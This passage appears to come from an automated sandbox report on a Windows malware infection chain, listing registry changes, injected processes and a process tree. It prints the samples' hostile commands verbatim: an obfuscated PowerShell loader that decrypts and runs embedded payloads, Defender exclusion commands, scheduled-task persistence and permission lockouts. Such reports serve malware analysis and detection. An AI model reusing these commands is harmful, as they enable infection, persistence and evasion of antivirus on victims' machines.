Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe100000003fbc299b5b45d901f7343c906945d901be3135e39160d90114000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 4e003100000000007b56ba4e100054656d7000003a0009000400efbe5456c7957b56ba4e2e000000a5e101000000010000000000000000000000000000009b7e5c00540065006d007000000014000000 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 820074001c004346534616003100000000005456c795120041707044617461000000741a595e96dfd3488d671733bcee28bac5cdfadf9f6756418947c5c76bc0b67f400009000400efbe5456c7957b567d4e2e00000091e101000000010000000000000000000000000000008c815d004100700070004400610074006100000042000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings Explorer.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
Explorer.EXEpid process 3172 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
file.exetaskmgr.exeExplorer.EXEpid process 1500 file.exe 1500 file.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 2972 taskmgr.exe 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 2972 taskmgr.exe 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 2972 taskmgr.exe 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
taskmgr.exeExplorer.EXEpid process 2972 taskmgr.exe 3172 Explorer.EXE -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 668 -
Suspicious behavior: MapViewOfSection 22 IoCs
Processes:
file.exeEA37.exe5EE.exeExplorer.EXEwjtaraipid process 1500 file.exe 392 EA37.exe 3396 5EE.exe 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 1908 wjtarai -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
taskmgr.exeExplorer.EXEdescription pid process Token: SeDebugPrivilege 2972 taskmgr.exe Token: SeSystemProfilePrivilege 2972 taskmgr.exe Token: SeCreateGlobalPrivilege 2972 taskmgr.exe Token: SeSecurityPrivilege 2972 taskmgr.exe Token: SeTakeOwnershipPrivilege 2972 taskmgr.exe Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeSecurityPrivilege 2972 taskmgr.exe Token: SeTakeOwnershipPrivilege 2972 taskmgr.exe Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeShutdownPrivilege 3172 Explorer.EXE Token: SeCreatePagefilePrivilege 3172 Explorer.EXE Token: SeShutdownPrivilege 3172 Explorer.EXE -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
taskmgr.exepid process 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
taskmgr.exepid process 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
Explorer.EXEpid process 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE 3172 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Explorer.EXEE3BD.exeE3BD.exeE3BD.exeE3BD.exebuild3.exe19A7.exePlayer3.exenbveek.exedescription pid process target process PID 3172 wrote to memory of 4496 3172 Explorer.EXE E3BD.exe PID 3172 wrote to memory of 4496 3172 Explorer.EXE E3BD.exe PID 3172 wrote to memory of 4496 3172 Explorer.EXE E3BD.exe PID 4496 wrote to memory of 1116 4496 E3BD.exe E3BD.exe PID 4496 wrote to memory of 1116 4496 E3BD.exe E3BD.exe PID 4496 wrote to memory of 1116 4496 E3BD.exe E3BD.exe PID 4496 wrote to memory of 1116 4496 E3BD.exe E3BD.exe PID 4496 wrote to memory of 1116 4496 E3BD.exe E3BD.exe PID 4496 wrote to memory of 1116 4496 E3BD.exe E3BD.exe PID 4496 wrote to memory of 1116 4496 E3BD.exe E3BD.exe PID 4496 wrote to memory of 1116 4496 E3BD.exe E3BD.exe PID 4496 wrote to memory of 1116 4496 E3BD.exe E3BD.exe PID 4496 wrote to memory of 1116 4496 E3BD.exe E3BD.exe PID 3172 wrote to memory of 392 3172 Explorer.EXE EA37.exe PID 3172 wrote to memory of 392 3172 Explorer.EXE EA37.exe PID 3172 wrote to memory of 392 3172 Explorer.EXE EA37.exe PID 3172 wrote to memory of 4520 3172 Explorer.EXE ED16.exe PID 3172 wrote to memory of 4520 3172 Explorer.EXE ED16.exe PID 3172 wrote to memory of 4520 3172 Explorer.EXE ED16.exe PID 1116 wrote to memory of 3212 1116 E3BD.exe icacls.exe PID 1116 wrote to memory of 3212 1116 E3BD.exe icacls.exe PID 1116 wrote to memory of 3212 1116 E3BD.exe icacls.exe PID 1116 wrote to memory of 212 1116 E3BD.exe E3BD.exe PID 1116 wrote to memory of 212 1116 E3BD.exe E3BD.exe PID 1116 wrote to memory of 212 1116 E3BD.exe E3BD.exe PID 212 wrote to memory of 3696 212 E3BD.exe E3BD.exe PID 212 wrote to memory of 3696 212 E3BD.exe E3BD.exe PID 212 wrote to memory of 3696 212 E3BD.exe E3BD.exe PID 212 wrote to memory of 3696 212 E3BD.exe E3BD.exe PID 212 wrote to memory of 3696 212 E3BD.exe E3BD.exe PID 212 wrote to memory of 3696 212 E3BD.exe E3BD.exe PID 212 wrote to memory of 3696 212 E3BD.exe E3BD.exe PID 212 wrote to memory of 3696 212 E3BD.exe E3BD.exe PID 212 wrote to memory of 3696 212 E3BD.exe E3BD.exe PID 212 wrote to memory of 3696 212 E3BD.exe E3BD.exe PID 3172 wrote to memory of 3396 3172 Explorer.EXE 5EE.exe PID 3172 wrote to memory of 3396 3172 Explorer.EXE 5EE.exe PID 3172 wrote to memory of 3396 3172 Explorer.EXE 5EE.exe PID 3172 wrote to memory of 3676 3172 Explorer.EXE 851.exe PID 3172 wrote to memory of 3676 3172 Explorer.EXE 851.exe PID 3172 wrote to memory of 3676 3172 Explorer.EXE 851.exe PID 3696 wrote to memory of 780 3696 E3BD.exe build3.exe PID 3696 wrote to memory of 780 3696 E3BD.exe build3.exe PID 3696 wrote to memory of 780 3696 E3BD.exe build3.exe PID 780 wrote to memory of 4832 780 build3.exe schtasks.exe PID 780 wrote to memory of 4832 780 build3.exe schtasks.exe PID 780 wrote to memory of 4832 780 build3.exe schtasks.exe PID 3172 wrote to memory of 3048 3172 Explorer.EXE 19A7.exe PID 3172 wrote to memory of 3048 3172 Explorer.EXE 19A7.exe PID 3172 wrote to memory of 3048 3172 Explorer.EXE 19A7.exe PID 3048 wrote to memory of 3792 3048 19A7.exe Player3.exe PID 3048 wrote to memory of 3792 3048 19A7.exe Player3.exe PID 3048 wrote to memory of 3792 3048 19A7.exe Player3.exe PID 3048 wrote to memory of 4092 3048 19A7.exe ss31.exe PID 3048 wrote to memory of 4092 3048 19A7.exe ss31.exe PID 3048 wrote to memory of 4996 3048 19A7.exe XandETC.exe PID 3048 wrote to memory of 4996 3048 19A7.exe XandETC.exe PID 3792 wrote to memory of 4576 3792 Player3.exe nbveek.exe PID 3792 wrote to memory of 4576 3792 Player3.exe nbveek.exe PID 3792 wrote to memory of 4576 3792 Player3.exe nbveek.exe PID 4576 wrote to memory of 4160 4576 nbveek.exe schtasks.exe PID 4576 wrote to memory of 4160 4576 nbveek.exe schtasks.exe PID 4576 wrote to memory of 4160 4576 nbveek.exe schtasks.exe PID 4576 wrote to memory of 3232 4576 nbveek.exe cmd.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
Processes:
dllhost.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook dllhost.exe -
outlook_win_path 1 IoCs
Processes:
dllhost.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook dllhost.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\E3BD.exeC:\Users\Admin\AppData\Local\Temp\E3BD.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\E3BD.exeC:\Users\Admin\AppData\Local\Temp\E3BD.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\4dbd1898-d200-4d2a-b39c-a640ea533983" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\E3BD.exe"C:\Users\Admin\AppData\Local\Temp\E3BD.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\E3BD.exe"C:\Users\Admin\AppData\Local\Temp\E3BD.exe" --Admin IsNotAutoStart IsNotTask5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\7e557038-2294-4470-b05e-035177f746a6\build3.exe"C:\Users\Admin\AppData\Local\7e557038-2294-4470-b05e-035177f746a6\build3.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\EA37.exeC:\Users\Admin\AppData\Local\Temp\EA37.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\ED16.exeC:\Users\Admin\AppData\Local\Temp\ED16.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 3403⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\5EE.exeC:\Users\Admin\AppData\Local\Temp\5EE.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\851.exeC:\Users\Admin\AppData\Local\Temp\851.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3676 -s 3403⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\19A7.exeC:\Users\Admin\AppData\Local\Temp\19A7.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Player3.exe"C:\Users\Admin\AppData\Local\Temp\Player3.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "Admin:N"&&CACLS "..\16de06bfb4" /P "Admin:R" /E&&Exit5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"6⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:N"6⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:R" /E6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"6⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\16de06bfb4" /P "Admin:N"6⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\16de06bfb4" /P "Admin:R" /E6⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main5⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main6⤵
- Loads dropped DLL
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1460 -s 6527⤵
- Program crash
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\clip64.dll, Main5⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\ss31.exe"C:\Users\Admin\AppData\Local\Temp\ss31.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\XandETC.exe"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\2810.exeC:\Users\Admin\AppData\Local\Temp\2810.exe2⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Player3.exe"C:\Users\Admin\AppData\Local\Temp\Player3.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 15203⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\88BF.exeC:\Users\Admin\AppData\Local\Temp\88BF.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\BAFB.exeC:\Users\Admin\AppData\Local\Temp\BAFB.exe2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C424.bat" "2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -c #3⤵
-
C:\Users\Admin\AppData\Local\Temp\C424.bat.exe"C:\Users\Admin\AppData\Local\Temp\C424.bat.exe" function PX($c){$c.Replace('EOIUi', '')}$UcNH=PX 'GeEOIUitCurEOIUirenEOIUitPrEOIUioceEOIUissEOIUi';$LMam=PX 'REOIUieaEOIUidLEOIUiinEOIUieEOIUisEOIUi';$nIei=PX 'CEOIUihEOIUiangEOIUieEOIUiExteEOIUinEOIUisiEOIUionEOIUi';$GDjp=PX 'InEOIUivokEOIUieEOIUi';$cJOL=PX 'FEOIUiirsEOIUitEOIUi';$bNvC=PX 'EntrEOIUiyPoEOIUiiEOIUintEOIUi';$ZDDe=PX 'FroEOIUimBEOIUiaseEOIUi64SEOIUitrEOIUiingEOIUi';$wEka=PX 'LoaEOIUidEOIUi';$xsru=PX 'CreEOIUiatEOIUieDEOIUiecrEOIUiyEOIUipEOIUitoEOIUirEOIUi';$JaHM=PX 'TrEOIUianEOIUisforEOIUimFEOIUiinEOIUialEOIUiBlEOIUiockEOIUi';function AyMSx($aADFu){$mkeZq=[System.Security.Cryptography.Aes]::Create();$mkeZq.Mode=[System.Security.Cryptography.CipherMode]::CBC;$mkeZq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$mkeZq.Key=[System.Convert]::$ZDDe('33o4mPrkfBEGS8RPjJSCxTGdyodbZrRhtRuNUH5rzRk=');$mkeZq.IV=[System.Convert]::$ZDDe('Pw0jyFBtnQYUrNsqUX5AOg==');$kgbNu=$mkeZq.$xsru();$gGieg=$kgbNu.$JaHM($aADFu,0,$aADFu.Length);$kgbNu.Dispose();$mkeZq.Dispose();$gGieg;}function QpgTW($aADFu){$lUmJr=New-Object System.IO.MemoryStream(,$aADFu);$vxHfp=New-Object System.IO.MemoryStream;$CEpcv=New-Object System.IO.Compression.GZipStream($lUmJr,[IO.Compression.CompressionMode]::Decompress);$CEpcv.CopyTo($vxHfp);$CEpcv.Dispose();$lUmJr.Dispose();$vxHfp.Dispose();$vxHfp.ToArray();}function jfGQF($aADFu,$OnnHT){[System.Reflection.Assembly]::$wEka([byte[]]$aADFu).$bNvC.$GDjp($null,$OnnHT);}$oEcWz=[System.Linq.Enumerable]::$cJOL([System.IO.File]::$LMam([System.IO.Path]::$nIei([System.Diagnostics.Process]::$UcNH().MainModule.FileName, $null)));$fmJXF = $oEcWz.Substring(3).Split('\');$xAiAZ=QpgTW (AyMSx ([Convert]::$ZDDe($fmJXF[0])));$AjQdR=QpgTW (AyMSx ([Convert]::$ZDDe($fmJXF[1])));jfGQF $AjQdR $null;jfGQF $xAiAZ $null;3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(3328);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\C424')4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_JGAbA' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\JGAbA.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\JGAbA.vbs"4⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\JGAbA.bat" "5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -c #6⤵
-
